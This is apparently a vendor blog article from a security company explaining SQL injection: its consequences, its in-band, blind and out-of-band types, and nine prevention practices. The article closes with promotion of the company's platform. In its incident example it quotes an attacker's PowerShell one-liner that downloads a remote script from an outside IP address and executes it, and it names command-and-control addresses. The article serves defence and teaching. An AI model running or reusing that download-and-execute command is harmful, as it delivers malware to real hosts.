What Is SQL Injection (SQLi)?

SQL injection (SQLi) is a cyberattack that injects malicious SQL code into an application, allowing the attacker to view or modify a database. According to the Open Web Application Security Project, injection attacks, which include SQL injections, were the third most serious web application security risk in 2021. In the applications they tested, there were 274,000 occurrences of injection.

To protect against SQL injection attacks, it is essential to understand what their impact is and how they happen so you can follow best practices, test for vulnerabilities, and consider investing in software that actively prevents attacks.

Consequences of a Successful SQL Injection Attack

SQL injection attacks can have a significant negative impact on an organization. Organizations have access to sensitive company data and private customer information, and SQL injection attacks often target that confidential information. When a malicious user successfully completes an SQL injection attack, it can have any of the following impacts:

  • Exposes Sensitive Company Data: Using SQL injection, attackers can retrieve and alter data, which risks exposing sensitive company data stored on the SQL server.
  • Compromise Users’ Privacy: Depending on the data stored on the SQL server, an attack can expose private user data, such as credit card numbers.
  • Give an attacker administrative access to your system: If a database user has administrative privileges, an attacker can gain access to the system using malicious code. To protect against this kind of vulnerability, create a database user with the least possible privileges.
  • Give an Attacker General Access to Your System: If you use weak SQL commands to check user names and passwords, an attacker could gain access to your system without knowing a user’s credentials. With general access to your system, an attacker can cause additional damage accessing and manipulating sensitive information.
  • Compromise the Integrity of Your Data: Using SQL injection, attackers can make changes to or delete information from your system.

Because the impact of a successful SQL injection attack can be severe, it’s important for businesses to practice prevention and limit vulnerabilities before an attack occurs. To do that, you must understand how a SQL injection attack occurs, so you know what you’re up against.

3 Types of SQL Injection

By understanding cybersecurity threats, organizations can better prepare for attacks and remedy vulnerabilities. Let’s take a look at the types of SQL injection attacks, which fall into three categories: in-band SQL injection, inferential SQL injection and out-of-band SQL injection.

1. In-band SQL Injection

In-band SQL injection is the most common type of attack. With this type of SQL injection attack, a malicious user uses the same communication channel for the attack and to gather results. The following techniques are the most common types of in-band SQL injection attacks:

  • Error-based SQL injection: With this technique, attackers gain information about the database structure when they use a SQL command to generate an error message from the database server. Error messages are useful when developing a web application or web page, but they can be a vulnerability later because they expose information about the database. To prevent this vulnerability, you can disable error messages after a website or application is live.
  • Union-based SQL injection: With this technique, attackers use the UNION SQL operator to combine multiple select statements and return a single HTTP response. An attacker can use this technique to extract information from the database. This technique is the most common type of SQL injection and requires more security measures to combat than error-based SQL injection.

2. Inferential SQL Injection

Inferential SQL injection is also called blind SQL injection because the website database doesn’t transfer data to the attacker like with in-band SQL injection. Instead, a malicious user can learn about the structure of the server by sending data payloads and observing the response. Inferential SQL injection attacks are less common than in-band SQL injection attacks because they can take longer to complete. The two types of inferential SQL injection attacks use the following techniques:

  • Boolean injection: With this technique, attackers send a SQL query to the database and observe the result. Attackers can infer if a result is true or false based on whether the information in the HTTP response was modified.
  • Time-based injection: With this technique, attackers send a SQL query to the database, making the database wait a specific number of seconds before responding. Attackers can determine if the result is true or false based on the number of seconds that elapses before a response. For example, a hacker could use a SQL query that commands a delay if the first letter of the first database’s name is A. Then, if the response is delayed, the attacker knows the query is true.

3. Out-of-Band SQL Injection

Out-of-band SQL injection is the least common type of attack. With this type of SQL injection attack, malicious users use a different communication channel for the attack than they use to gather results. Attackers use this method if a server is too slow or unstable to use inferential SQL injection or in-band SQL injection.

How Is an SQL Injection Attack Performed?

SQL is a language used in programming that is designed for data in a relational data stream management system. SQL queries execute commands, including commands to retrieve data, update data and delete records. To execute malicious commands, an attacker can insert malicious code into strings that are passed to a SQL server to execute. There are several ways that malicious users can execute an attack, but common vulnerable inputs in a web application or web page are user-input fields like forms that allow free text.

SQL Injection Example

Crowdstrike Falcon Overwatch observed an incident in which SQL was injected successfully to gain code execution as an initial infection vector, leading to the execution of encoded PowerShell commands which encoded to:

$p=((New-Object Net.WebClient).DownloadString('http[:]//46.17.105[.]207/lzbt6001sop_64refl.ps1'));$p|.('IeX')

The command triggered the download of a Demux PowerShell loader commonly used by Carbon Spider, a cyber adversary that primarily targets the hospitality and retail sectors to gather payment card data. Demur executed a stager DLL in memory that used 46.17.105[.]207 and 185.242.85[.]126 for command-and-control (C2) communications.

Additionally, the actor used both echo 1 and ping -n [number] 127.0.0.1 multiple times to ensure connectivity and responsiveness of the host to the SQL Injection attempts. It also used wmic to query the domain name.

9 Best Practices to Protect Your Database from SQL Injection

When developing your website or web application, you can incorporate security measures that limit your exposure to SQL injection attacks. For example, the following security prevention measures are the most effective ways to prevent SQL injection attacks:

  1. Install the latest software and security patches from vendors when available.
  2. Give accounts that connect to the SQL database only the minimum privileges needed.
  3. Don’t share database accounts across different websites and applications.
  4. Use validation for all types of user-supplied input, including drop-down menus.
  5. Configure error reporting instead of sending error messages to the client web browser.
  6. Use prepared statements with parameterized queries that define all the SQL code and pass in each parameter so attackers can't change the intent of a query later.
  7. Use stored procedures to build SQL statements with parameters that are stored in the database and called from the application.
  8. Use allowlist input validation to prevent unvalidated user input from being added to query.
  9. Escape all user-supplied input before putting it in a query so that the input isn’t confused with SQL code from the developer.

In general, organizations should avoid using shared accounts so that attackers can’t gain further access if one account is compromised. Organizations should also avoid sending database error messages to the client web browser because attackers can use that information to understand technical details about the database.

CrowdStrike's Approach to Stopping SQL Attacks

Because SQL injection is a common hacking technique and the consequences can be severe, it’s important to protect your business from these threats. By following best practices and periodically testing for vulnerabilities, you can reduce the likelihood of becoming a victim of a SQL injection attack. In addition, organizations should consider investing in a comprehensive cybersecurity solution like the CrowdStrike Falcon® platform. Cybersecurity solutions help strengthen your security posture against SQL injection and many other cybersecurity risks.

The Falcon platform is highly modular and extensible, making it easy to adopt the protection you need. The cloud-based architecture can defend enterprise organizations without compromising speed and performance. CrowdStrike’s platform can help you secure the most critical areas of enterprise risk: endpoints, cloud workloads, identities, and data. To see how CrowdStrike could protect your business from a SQL injection attack, read how CrowdStrike’s threat hunting and intelligence teams stopped a SQL injection campaign.

Bart is Senior Product Marketing Manager of Threat Intelligence at CrowdStrike and holds +20 years of experience in threat monitoring, detection and intelligence. After starting his career as a network security operations analyst at a Belgian financial organization, Bart moved to the US East Coast to join multiple cybersecurity companies including 3Com/Tippingpoint, RSA Security, Symantec, McAfee, Venafi and FireEye-Mandiant, holding both product management, as well as product marketing roles.